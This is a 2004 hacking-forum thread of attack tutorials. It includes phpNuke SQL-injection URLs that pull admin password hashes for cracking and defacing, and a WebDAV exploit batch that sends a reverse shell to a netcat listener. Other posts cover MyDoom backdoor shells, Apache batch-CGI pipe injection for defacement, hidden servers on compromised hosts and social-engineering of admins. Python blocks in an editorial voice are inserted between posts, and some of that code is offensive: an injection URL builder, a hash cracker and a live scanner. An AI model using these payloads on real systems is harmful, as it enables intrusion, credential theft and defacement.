Government Security
Network Security Resources


Tutorials.

security hacking tutorial
67 replies to this topic

#16 whiskah

whiskah

    Staff Sergeant

  • Sergeant Major
  • 397 posts

Posted 04 March 2004 - 07:24 PM

Defacing phpNuke Sites Using Multiple SQL Injection Techniques
Although this is very old, I was surprised to see thousands of sites still
vulnerable, even security sites and some hacking sites running phpNuke.

TOOLS:
1. Google,Browser
2. MD5 password cracker
Cain and Abel
Lepton's Crack
Rainbowcrack
mdcrack
3. Wordlist


STEPS:

1. Google search strings (these are just examples; this is just how I did it), use your imagination:
allinurl:/modules.php?name=Downloads
allinurl:/modules.php?name=Web_links
allinurl:/modules.php?name=Sections
allinurl:/modules.php?name=Reviews
2. Go to the site, then copy and paste the strings that start with '&', so the query for the
Downloads module sample would be hxxp://phpnukesite/modules.php?name=Downloads&d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--

weblinks module sample would be hxxp://phpnukesite/modules.php?name=Web_links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*

Sections module sample would be
hxxp://phpnukesite/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors

Reviews module sample would be
hxxp://phpnukesite/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*

3. If you cracked the admin hash, then log in through http://phpnukesite/admin.php
4. Respect, and don't damage too much; just inform them to patch.
6. You will be amazed how many sites you can deface.
7. Some alternative queries are listed below:

[DOWNLOADS MODULE]
--admin,hash---
&d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--

--names,logins,passes
&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors

---all pseudos of users,pass---6.9
&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*

---6.9logins, ID, encrypted passwords, names, emails and levels of all reg users---
&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,0,0%20FROM%20nuke_users
---------------------------------------------------------------
allinurl:/modules.php?name=Web_Links
[WEBLINKS MODULE]
--user,hash----
&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*

--hash--
&l_op=viewlink&cid=2 UNION Select aid,pwd,1 from nuke_authors --

----admin username-------
&l_op=viewlink&cid=2 UNION Select 1,aid,pwd from nuke_authors --

--hash---
&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors

----Resteer towards the password----
&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

-----------------------------------------------------------------
allinurl:/modules.php?name=Sections

[SECTIONS MODULE]
--admin hash---
&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors
---user,hash---
&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors

-----------------------------------------------------------------
allinurl:/modules.php?name=Reviews
[REVIEWS MODULE]

&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*
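The injections above work because each module pastes the "numeric" request parameter straight into its SQL text, so a UNION with the same number of columns as the original SELECT appends rows from nuke_authors to whatever the page renders. As an added example (not whiskah's code and not phpNuke's own source), here is that vulnerable pattern beside the hardened one, in Python over an in-memory SQLite database. The table layout, the sample admin row and the Downloads category table are constructed for the demo (column names are assumptions), and the admin hash is md5("password").

```python
import re
import sqlite3
from urllib.parse import quote

# Constructed sample data. The schema only approximates the phpNuke tables named in
# the post: nuke_authors column names are assumptions, and the category table is
# invented to give the UNION three columns to line up with.
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"   # md5("password"), unsalted


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE nuke_authors (
            aid TEXT, name TEXT, email TEXT, url TEXT, pwd TEXT, counter INTEGER);
        CREATE TABLE nuke_downloads_categories (
            cid INTEGER, title TEXT, cdescription TEXT);
        INSERT INTO nuke_downloads_categories VALUES (2, 'Utilities', 'Small tools');
    """)
    conn.execute("INSERT INTO nuke_authors VALUES (?, ?, ?, ?, ?, ?)",
                 ("admin", "Site Admin", "admin@example.invalid",
                  "http://example.invalid", ADMIN_HASH, 0))
    return conn


def vulnerable_lookup(conn, cid):
    """The pattern the old modules used: the parameter is concatenated into the SQL."""
    sql = ("SELECT cid, title, cdescription FROM nuke_downloads_categories "
           "WHERE cid=" + str(cid))
    return conn.execute(sql).fetchall()


def safe_lookup(conn, cid):
    """Hardened form: check the type first, then bind the value instead of pasting it."""
    if not re.fullmatch(r"-?\d+", str(cid)):
        raise ValueError("cid must be an integer")
    return conn.execute(
        "SELECT cid, title, cdescription FROM nuke_downloads_categories WHERE cid=?",
        (int(cid),)).fetchall()


# The Downloads-module payload from the post: three columns to match the three the
# original SELECT returns, and '--' to comment out whatever the module appends.
PAYLOAD = "2 UNION select counter,aid,pwd from nuke_authors--"


def build_url(base, module, op_param, op_value, id_param, payload):
    """Percent-encode the payload the way the post's URLs show it (spaces as %20)."""
    return (f"{base}/modules.php?name={module}&{op_param}={op_value}"
            f"&{id_param}={quote(payload, safe=',*-/')}")


def extract_hashes(rows):
    """Pull 32-hex (MD5-shaped) strings out of whatever the page ended up rendering."""
    text = " ".join(str(col) for row in rows for col in row)
    return re.findall(r"\b[0-9a-f]{32}\b", text)


if __name__ == "__main__":
    db = make_db()
    print(build_url("http://phpnukesite", "Downloads", "d_op", "viewdownload", "cid", PAYLOAD))
    rows = vulnerable_lookup(db, PAYLOAD)
    print("leaked:", extract_hashes(rows))        # ['5f4dcc3b5aa765d61d8327deb882cf99']
    try:
        safe_lookup(db, PAYLOAD)
    except ValueError as err:
        print("rejected:", err)
```

The column count is the whole trick: every payload in the post pads its SELECT with literals (0, 1, email, url...) until it has exactly as many columns as the module's own query, which is why the Reviews payload needs twelve and the Downloads one three. The hardened lookup closes the hole twice over, by rejecting anything that is not an integer and by binding the value as a parameter, so no SQL ever reaches the engine from the request.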

#17 Guest_Jay_*

Guest_Jay_*
  • Guests

Posted 04 March 2004 - 11:18 PM

Thanks for that.

4. Respect and don't damage too much, Just inform them to patch
6. You will be amazed how many sites you can deface



I hope everyone lets the admin know and does not deface the web site <_<

#18 Guest_rockerx_*

Guest_rockerx_*
  • Guests

Posted 05 March 2004 - 01:59 PM

Hi, I wrote this today. The English translation is just for this board.

E n g l i s h

What do we want?
- We want to set up a very simple web server on the rooted server.

What do we need?
- hiderun.exe
- miniwebserver.exe (you had better rename it)
- miniwebserver.ini
- some HTML files (optional)

OK, first we create the ini file.
Open your favourite editor, type the following text and save it as miniwebserver.ini:

Port=13373
Root=C:\
Listing=1

"Port" is self-explanatory.
"Root" is the directory where the server looks for the HTML files (it needs to exist).
"Listing" shows a directory listing if HTML files are missing; options: 0 (disabled), 1 (enabled).

OK, now upload the files to the server into one and the same directory and start the server using:
hiderun miniwebserver.exe cfg=miniwebserver.ini

Now it's done! The server is up!

Note: after a reboot the web server will not start up automatically,
but you know how to solve this problem :)

rockerx


G e r m a n  (translated)

What does this text describe?
- How we set up a small, simple web server on a hacked server

What do we need for that?
- hiderun.exe
- miniwebserver.exe (better rename it)
- miniwebserver.ini
- HTML files (optional)

OK, first we write the ini file.
Type the following lines into your editor and save them as miniwebserver.ini:

Port=13373
Root=C:\
Listing=1

"Port" is self-explanatory
"Root" is the directory where the server expects the HTML files
"Listing": shows the directory contents if no index.html exists; options 0 (disabled), 1 (enabled)

Good, now upload the files to the server into one directory and start the web server as follows:
hiderun miniwebserver.exe cfg=miniwebserver.ini

OK, now the server is running.

After a reboot the web server will not be started automatically, but you know how to take care of that.

rockerx

#19 Guest_rotem_*

Guest_rotem_*
  • Guests

Posted 19 March 2004 - 06:09 AM

Can someone explain something to me about MyDoom?
Please tell me what tools I need
and how I send the packet to the host?

#20 JohnAcres

JohnAcres

    Private First Class

  • Members
  • 21 posts

Posted 20 March 2004 - 10:33 AM

Hacking WebDav

I'm going to do this tutorial like a science lab because I like that format. I haven't really read around that much, so I'm not sure if this has been posted before or if this is even needed.

Purpose: Get a shell on the host.

Tools/Materials: wb.exe (the WebDav exploit by kralor, www.coromputer.net)
nc.exe (netcat)

Procedure:
1. Open up netcat: nc -L -vv -p 1434
2. Make a bat file for wb.exe to try all the paddings, to make it easier.

This will cover all the paddings; just replace %1 with the target computer and %2 with the computer that you want the victim to connect to.
wb %1 %2 1434 0
wb %1 %2 1434 1
wb %1 %2 1434 2
wb %1 %2 1434 3
wb %1 %2 1434 4
wb %1 %2 1434 5
wb %1 %2 1434 6
wb %1 %2 1434 7
wb %1 %2 1434 8
wb %1 %2 1434 9
wb %1 %2 1434 10
wb %1 %2 1434 11
wb %1 %2 1434 12
wb %1 %2 1434 13
wb %1 %2 1434 14
wb %1 %2 1434 15
wb %1 %2 1434 16
wb %1 %2 1434 17
wb %1 %2 1434 18
wb %1 %2 1434 19
wb %1 %2 1434 20
wb %1 %2 1434 0
wb %1 %2 1434 1
wb %1 %2 1434 2
wb %1 %2 1434 3
wb %1 %2 1434 4
wb %1 %2 1434 5
wb %1 %2 1434 6
wb %1 %2 1434 7
wb %1 %2 1434 8
wb %1 %2 1434 9
wb %1 %2 1434 10
wb %1 %2 1434 11
wb %1 %2 1434 12
wb %1 %2 1434 13
wb %1 %2 1434 14
wb %1 %2 1434 15
wb %1 %2 1434 16
wb %1 %2 1434 17
wb %1 %2 1434 18
wb %1 %2 1434 19
wb %1 %2 1434 20
wb %1 %2 1434 203
wb %1 %2 1434 71
wb %1 %2 1434 190
wb %1 %2 1434 194
wb %1 %2 1434 200
wb %1 %2 1434 -3

3. Run the bat and watch nc for the shell.

That's about it... not hard, not complicated, or really new, but I thought it might help someone out.

#21 Logan

Logan

    Specialist

  • Sergeant Major
  • 1,596 posts

Posted 21 March 2004 - 03:16 PM

People, this is for tutorials... not for requesting tutorials...

Some of these are nice for new talent; good job, guys.
About the one using echo...
You can just use Notepad or any word processor to make life way easier, but if you're in DOS or constructing a batch file, that's a very useful command.....


#22 NeBoKaDnEzZaR

NeBoKaDnEzZaR

    Private First Class

  • Members
  • 49 posts

Posted 25 March 2004 - 12:25 AM

Hey, thanks a lot for the web server tutorial. :D A really good idea to make it in two languages; respect. I will also make tutorials here when I have learned something new. Was a good idea.

Greez NeBo

#23 TwitcH

TwitcH

    Private First Class

  • Members
  • 40 posts

Posted 25 March 2004 - 02:06 AM

This tut is just a little something I'm still working on; hope this helps.




Gathering Information On Your Target V1.6 An Unsecure Team Tutorial

http://unsecure.khgamez.com Author: TwitcH Date: 25/03/04

-ContentS-
1: Gathering Basic Information on the Administrator
2: Gaining Your Target's IP Address
3: Finding Out the Target's Operating System Type and the Services It Is Running
4: Port Scanners Will Help You Uncover Those Holes...
5: Finding Exploits for These Services

ChapteR 1: Gathering Basic Information On the Administrator

Gathering information on the person that runs your target system might seem a bit silly, but believe me, it can help a damn lot when trying to gain access to the system. One example of this is cracking passwords, i.e. you're trying to use a dictionary attack on his password hash using an English dictionary when in fact he is actually Japanese and so is his password. Another reason this can be very useful is that social engineers can get to know his/her habits/hobbies/interests and work their way into the system by tricking people he works with into giving you access.

We'll start by visiting the admin's website; take note of the topic of the website, as this can be a very big clue as to what the admin is interested in (and you could also find other less secure sites he might have a username and password on, to try and get his password, which might also be the password to his e-mail/server). Also try and grab his e-mail address (even his e-mail address's name could be a big clue as to what his password is). You can even try slapping his e-mail address into MSN and try to talk to him, pretending to be someone he knows or someone interested in what his server is running (just try not to sound too suspicious). Once you know as much as you can about the admin, try doing a finger or whois on his website/e-mail (these tools are explained in the mini-tutorials section on the unsecure site). I think that's about all you can do to find out about the admin (just remember exploiting/cracking isn't the only way into a server).

ChapteR 2: Gaining Your Targets IP Address

This is a very important but relatively easy part of gathering information on the target. You will need the target's IP address to use tools such as port scanners, exploits, sniffers, blah blah blah... Getting it, as I said earlier, is a piece of piss; one easy way of doing this is nslookup: just go to your command line and type nslookup "inserthostname here" (without the quotes!!). This should hopefully bring up the host's IP address. BUT! This might not be the way into the server; you might need to hack the admin's personal computer, so you will need the admin's personal computer's IP address, and getting this can be a bit harder. I can't think of any definite way of doing this, but there are some tools that you can download that will let you get the IP address using MSN, ICQ and other programs that use a connection between the two computers.

Chapter 3: Port Scanners Will Help You Uncover Those Holes...

There are lots of different port scanners available for you today; some have millions of options, others just do a simple TCP scan. This chapter will just tell you a little about the best ones available and where to get them from.

Nmap:
Nmap can be found at http://www.insecure.org and is a Linux-based port scanner (although there is a Windows port, I don't recommend it due to really slow scanning times).
Nmap's best feature is its number of scanning options, some of which are:
* Vanilla TCP connect() scanning,
* TCP SYN (half open) scanning,
* TCP FIN (stealth) scanning,
* TCP ftp proxy (bounce attack) scanning,
* SYN/FIN scanning using IP fragments (bypasses packet filters),
* UDP recvfrom() scanning,
* UDP raw ICMP port unreachable scanning,
* ICMP scanning (ping-sweep), and
* Reverse-ident scanning.
* OS Detection

As you can see, that's quite a list, and very, very useful in any hacker's eyes ;).

GFI LanGuard Network Security Scanner: http://www.gfi.com
This is a Windows-based scanner with a nice, easy-to-use GUI. This scanner will not only detect the OS version, scan the ports and do port range scans, it also looks to see if the target has any security holes!! This little bugger will scan their computer using the latest exploits/trojan ports and tell you if the target computer is exploitable. This can help a damn lot when gathering information on a target. Once the scanner has found an exploit, it will show you a link to the BugTraq listing for this exploit, where you can possibly find out how to exploit this hole.

NetScan Tools Pro 2000: http://www.nwpsw.com
This is a simpler version of a Windows GUI-based port scanner, but this one has a shitload more options, things like finger, ping, traceroute, WhoIs, SMTP e-mail generator, NetBIOS info lookup and about 10 more... The only thing is, this one is not free; you have to pay for it. (Although I do think I saw this floating around DC++ ;) )


ChapteR 4: Finding Exploits For The Services

This part is simple; everyone, no matter how dumb, should be able to find an exploit. Just try and find out the version of the service you want to exploit, open up Google and search for "blabla 1.0 exploit" or something along those lines. Find the exploits, compile, read the instructions and attack. I'll write up another tutorial on using some common exploits one day (just vote for the tutorial you want at unsecure.khgamez.com). Well, that just about wraps it up for version 1 of this tutorial (yes, I said version one; this thing will get updated and will go into the extreme details of everything I've mentioned in here), so while you're waiting for fuller explanations and techniques for gathering information on your target server, head over to unsecure.khgamez.com and fill them boards, post some tutorials and submit some news.
Another way of finding new exploits is to sign yourself up to an exploit mailing list; these can be very helpful on difficult hacks because new exploits are appearing

Anyone wanting to be a part of the unsecure.khgamez.com team should send me an e-mail at illuminati_2600@hotmail.com. Thank you and happy hacking.

#24 migo

migo

    Private First Class

  • Members
  • 99 posts

Posted 31 March 2004 - 02:23 PM

wow!

#25 binary_hashes

binary_hashes

    Specialist

  • Members
  • 109 posts

Posted 31 March 2004 - 07:37 PM

Hi all,
I'm also new.
I want to know the difference between the MS03-026 and MS03-036 vulnerabilities.
Please, I need some guidance.

#26 Guest_eXtiGy_*

Guest_eXtiGy_*
  • Guests

Posted 03 April 2004 - 03:15 AM

MD5 password cracker


Hello all. Regarding this MD5 cracker, I always get stuck at "password size 6 scanning" for a very, very long time, like 2 hrs or more; it didn't continue cracking after 2 hours+. What is the problem? Anyone know? Or is the hash impossible to crack at all?

This is the hash, by the way: 48b63ee26e7e0f115bfc627cd9b6c725 :blink:
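As an added example, not part of this thread and not the cracker eXtiGy is using: a wordlist attack on an unsalted MD5 hash with a few mangling rules, next to the keyspace arithmetic that shows why an exhaustive search slows to a crawl once it reaches six characters. The target is md5("password"), a constructed stand-in rather than the hash posted above; the mini wordlist, the rule set and the 1,000,000 hashes/second rate are assumptions for the demo.

```python
import hashlib
import itertools
import string

# Constructed target: md5("password"). Deliberately NOT the hash from the post.
TARGET = "5f4dcc3b5aa765d61d8327deb882cf99"

# Constructed mini wordlist standing in for a real dictionary file (assumption).
WORDLIST = ["letmein", "qwerty", "Password", "dragon", "password", "admin"]


def md5_hex(candidate):
    return hashlib.md5(candidate.encode("latin-1")).hexdigest()


def mangle(word):
    """Tiny rule set: the word as-is and capitalised, each with common digit suffixes."""
    for base in (word, word.capitalize()):
        yield base
        for suffix in ("1", "123", "2004"):
            yield base + suffix


def wordlist_attack(target_hex, words):
    """Hash every mangled candidate and compare; return the plaintext or None."""
    target_hex = target_hex.lower()
    for word in words:
        for cand in mangle(word):
            if md5_hex(cand) == target_hex:
                return cand
    return None


def keyspace(charset_size, length):
    """Candidates an exhaustive search must hash to cover exactly this length."""
    return charset_size ** length


def eta_seconds(charset_size, length, rate_per_second):
    """Worst-case seconds to exhaust one length at a given hash rate."""
    return keyspace(charset_size, length) / rate_per_second


def brute_force(target_hex, charset, max_len):
    """Exhaustive search up to max_len; only sane for tiny keyspaces."""
    target_hex = target_hex.lower()
    for n in range(1, max_len + 1):
        for tup in itertools.product(charset, repeat=n):
            cand = "".join(tup)
            if md5_hex(cand) == target_hex:
                return cand
    return None


if __name__ == "__main__":
    print("wordlist hit:", wordlist_attack(TARGET, WORDLIST))
    # Each extra character multiplies the keyspace by the charset size, so length 6
    # is where a single-CPU brute-forcer (assumed ~1M MD5/s) stops feeling instant.
    for charset_size, label in ((36, "a-z0-9"), (95, "all printable ASCII")):
        for n in (4, 5, 6, 7):
            hours = eta_seconds(charset_size, n, 1_000_000) / 3600
            print(f"{label:20} len {n}: {keyspace(charset_size, n):>16,d} candidates, "
                  f"{hours:12.2f} h worst case")
    alnum = string.ascii_lowercase + string.digits
    print("brute force 'ab1':", brute_force(md5_hex("ab1"), alnum, 3))
```

The two strategies fail in opposite ways: the wordlist finishes in milliseconds but only ever finds passwords that are words (or words with a rule applied), while the exhaustive search always finds the password eventually but grows by a factor of the charset size per character, so a length-6 run over all 95 printable characters is a week's work on that assumed hardware. That gap is what rainbow tables (on the tools list earlier in the thread) trade disk for, and what salting takes away from the attacker.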

#27 Guest_Jay_*

Guest_Jay_*
  • Guests

Posted 03 April 2004 - 03:24 AM

eXtiGy, this looks like you are doing illegal things and then posting the hash in the main forum asking for help. This is a security forum and not a script-kiddie forum.

Member suspended. :angry:

#28 Guest_Cyberneo_*

Guest_Cyberneo_*
  • Guests

Posted 15 April 2004 - 07:06 PM

Can someone explain something to me about MyDoom?
Please tell me what tools I need
and how I send the packet to the host?

Hello, this is my first post around here and hopefully there will be a lot more soon. Well, MyDoom is not that big of a deal to get to; all you need to use MyDoom is a port scanner, rsCRT.exe, a telnet program like nc.exe and the program to exploit the vuln itself, called mykralor.exe.

1. So, first things first, you need to get the range you want to check for the doom vuln scanned, for which we'll use the port scanner, and set it to scan on port 3127.

2. After you get a list of results from the scan, you open rsCRT.exe, which will create a remote shell for us that we can upload to the place you're testing for security issues. So just set the IP and port you want this program to bind the shell to and hit the create button.

3. Now we need to prepare to get a shell. Open nc.exe and set it to listen (nc.exe -l -vv -p PORT#). It will wait for an incoming connection from the place you uploaded the program created with rsCRT.exe to, to give you a shell.

4. Open mykralor.exe and, with your results from the scan, run it like this:
i.e. mykralor.exe Target_IP 3127 shell.exe
*note* shell.exe should be in the same directory as mykralor.exe
This will start sending the packet to the provided hosts, and if the host is infected you'll get a prompt dropped in your nc.exe listening window.

To secure any site you find with this vuln, you just need to upload a file called securemydoom.com, get into a cmd prompt and type securemydoom.com -NOC
With that, the program will start an autosearch on the site for infected files and will erase them from it, and your box will be cleaned from this nasty virus.

If you need this cleaner file just let me know. I can send it anywhere or post it here. Hope this helps you and anyone else that needs info on the MyDoom virus.
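Both TwitcH's port-scanner chapter (#23) and step 1 of the MyDoom post above (scan a range for TCP 3127) come down to the same TCP connect() probe. As an added example, not the original posters' code and not nmap, here is a small concurrent connect() scanner in Python with banner grabbing: scan_ports() checks many ports on one host (hostnames resolve inside the socket call, which covers the nslookup step from chapter 2), and sweep() checks one port across a CIDR range. The connect function is injectable; FAKE_NETWORK and fake_connect() are a constructed network map so the block runs offline, and with the default real socket call it scans actual hosts.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=1.0, connect=socket.create_connection):
    """TCP connect() probe of one host:port -> (host, port, state, banner).

    'connect' is injectable so the logic can run against a fake; the default is
    the real socket call, which also resolves hostnames (the nslookup step).
    """
    try:
        sock = connect((host, port), timeout=timeout)
    except ConnectionRefusedError:
        return host, port, "closed", ""      # RST came back: nothing listening
    except OSError:
        return host, port, "filtered", ""    # timeout/unreachable: dropped or no route
    try:
        sock.settimeout(timeout)
        # FTP/SMTP/SSH talk first; HTTP does not, so an empty banner only means
        # "open, but silent until we send a request".
        banner = sock.recv(256).decode("latin-1", "replace").strip()
    except OSError:
        banner = ""
    finally:
        sock.close()
    return host, port, "open", banner


def scan_ports(host, ports, timeout=1.0, workers=32, connect=socket.create_connection):
    """Scan many ports on one host; return {port: banner} for the open ones."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout, connect), ports))
    return {port: banner for _, port, state, banner in results if state == "open"}


def sweep(network, port, timeout=1.0, workers=64, connect=socket.create_connection):
    """Sweep a CIDR range for one port (e.g. 3127); return the hosts with it open."""
    hosts = [str(ip) for ip in ipaddress.ip_network(network, strict=False).hosts()]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda h: probe(h, port, timeout, connect), hosts))
    return sorted(h for h, _, state, _ in results if state == "open")


# --- constructed network map so the example runs offline (assumption, not real hosts) ---
FAKE_NETWORK = {
    ("10.0.0.5", 22): b"SSH-2.0-OpenSSH_3.8p1\r\n",
    ("10.0.0.5", 80): b"",          # open, but HTTP waits for the client to speak
    ("10.0.0.2", 3127): b"",        # the MyDoom backdoor port from the post
}
FAKE_FILTERED = {("10.0.0.5", 9999)}   # a firewall silently dropping the SYN


class _FakeSock:
    def __init__(self, banner): self.banner = banner
    def settimeout(self, t): pass
    def recv(self, n): return self.banner
    def close(self): pass


def fake_connect(addr, timeout=None):
    """Stand-in for socket.create_connection, driven by FAKE_NETWORK."""
    if addr in FAKE_FILTERED:
        raise TimeoutError("timed out")
    if addr in FAKE_NETWORK:
        return _FakeSock(FAKE_NETWORK[addr])
    raise ConnectionRefusedError


if __name__ == "__main__":
    print(scan_ports("10.0.0.5", [22, 80, 443, 9999], connect=fake_connect))
    # {22: 'SSH-2.0-OpenSSH_3.8p1', 80: ''}
    print(sweep("10.0.0.0/29", 3127, connect=fake_connect))   # ['10.0.0.2']
    # Real run against this machine; results depend on what is listening locally.
    print(scan_ports("127.0.0.1", [22, 80, 443, 3127], timeout=0.5))
```

A full connect() completes the three-way handshake, so every probe lands in the target's logs; that is the difference from the SYN (half-open) scan in the nmap list, which needs raw sockets and never sends the final ACK. The closed/filtered split is the other thing worth keeping: a refused connection proves a host is up and the port is unused, while a timeout tells you nothing except that something in between dropped the packet.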

#29 Guest_pink.frog_*

Guest_pink.frog_*
  • Guests

Posted 16 April 2004 - 11:09 AM

Thanks for the MyDoom Tut. Great piece of work

#30 TheRealGiant

TheRealGiant

    Private First Class

  • Members
  • 58 posts

Posted 17 April 2004 - 03:20 AM

Not new, but might help someone.

Apache Win32 - 1.3.23 & 2.0.28 Hacking

What you need :
+++++++++++++++

You don't need any tool to make the deface. This vulnerability can be exploited
via a browser.

_____________________________________________________________________________

Lets start...


1. This vulnerability has been exploited on:
   - Apache 1.3.23
   - Apache 2.0.28-BETA (by default includes the /cgi-bin/test-cgi.bat
     file, which enables this attack)

When a request for a DOS batch file (.bat or.cmd) is sent to an Apache
web server, the server will spawn a shell interpreter (cmd.exe by
default) and will run the script with the parameters sent to it by the
user. Because no proper validation is done on the input, it is possible
to send a pipe character ('|') with commands appended to it as
parameters to the CGI script, and the shell interpreter will execute
them.


2. Find a web server running Apache 1.3.23 (Win) or Apache 2.0.28-BETA (Win).

(a) To view the httpd.conf file residing in the /conf directory of the
Apache installation, you must copy it into the virtual web root.

To do this, write in your browser:

hxxp://www.target.com/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf


(b) To view the contents of the C:\ drive, create in /htdocs a file containing
the directory listing of the drive.

To do this, write in your browser:

hxxp://www.target.com/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt


(c) To make your deface you will use the echo command.

To do this, write in your browser:

hxxp://www.target.com/cgi-bin/test-cgi.bat?|echo+Defaced bY YOU+>>+..\htdocs\index.html

This will append the string "Defaced bY YOU" to the index.html file residing in
the virtual web root directory.


That's how this vulnerability can be exploited...
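As an added example, not from TheRealGiant's post and not Apache's own code: detection logic for the batch-CGI pipe injection described above, run over constructed access-log lines in common log format. It parses each line, decodes the query string (the '|' may arrive raw or as %7C, and '+' is a space in a CGI query) and reports any request for a .bat/.cmd CGI whose query carries a pipe, together with the injected command. The log lines, client IPs and timestamps are made up for the demo; the two attack lines reuse the copy and dir commands shown in the post.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (common log format); not a real server's log.
SAMPLE_LOG = [
    r'10.0.0.7 - - [17/Apr/2004:03:20:01 +0000] "GET /cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf HTTP/1.0" 200 512',
    r'10.0.0.7 - - [17/Apr/2004:03:20:05 +0000] "GET /cgi-bin/test-cgi.bat?%7Cdir+c:+%3E..%5Chtdocs%5Cdir.txt HTTP/1.0" 200 12',
    r'192.168.1.4 - - [17/Apr/2004:03:21:11 +0000] "GET /index.html HTTP/1.1" 200 3021',
    r'192.168.1.9 - - [17/Apr/2004:03:22:40 +0000] "GET /cgi-bin/test-cgi.bat?name=bob HTTP/1.1" 200 88',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)
BATCH_EXT = (".bat", ".cmd")   # the extensions Apache hands to cmd.exe


def parse_line(line):
    """Common-log-format line -> dict of fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def batch_injection(target):
    """Return the injected command if the request hits a batch CGI with a pipe, else None."""
    path, _, query = target.partition("?")
    if not path.lower().endswith(BATCH_EXT):
        return None
    decoded = unquote_plus(query)          # %7C -> '|', %5C -> '\', '+' -> ' '
    if "|" not in decoded:
        return None
    return decoded.split("|", 1)[1].strip()


def find_batch_injection(lines):
    """Scan log lines; return one finding per request that pipes a command into a .bat/.cmd CGI."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        cmd = batch_injection(rec["target"])
        if cmd is not None:
            hits.append({"ip": rec["ip"], "ts": rec["ts"],
                         "path": rec["target"].partition("?")[0], "command": cmd})
    return hits


if __name__ == "__main__":
    for hit in find_batch_injection(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["path"]} -> {hit["command"]}')
```

Matching on the decoded query rather than the raw one is the point: the same attack reads quite differently as a literal pipe and as %7C, and a rule keyed on the raw bytes misses one of them. The benign fourth line shows the other half of the check, that a request to the batch CGI is not by itself an attack; only a shell metacharacter in the arguments is.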




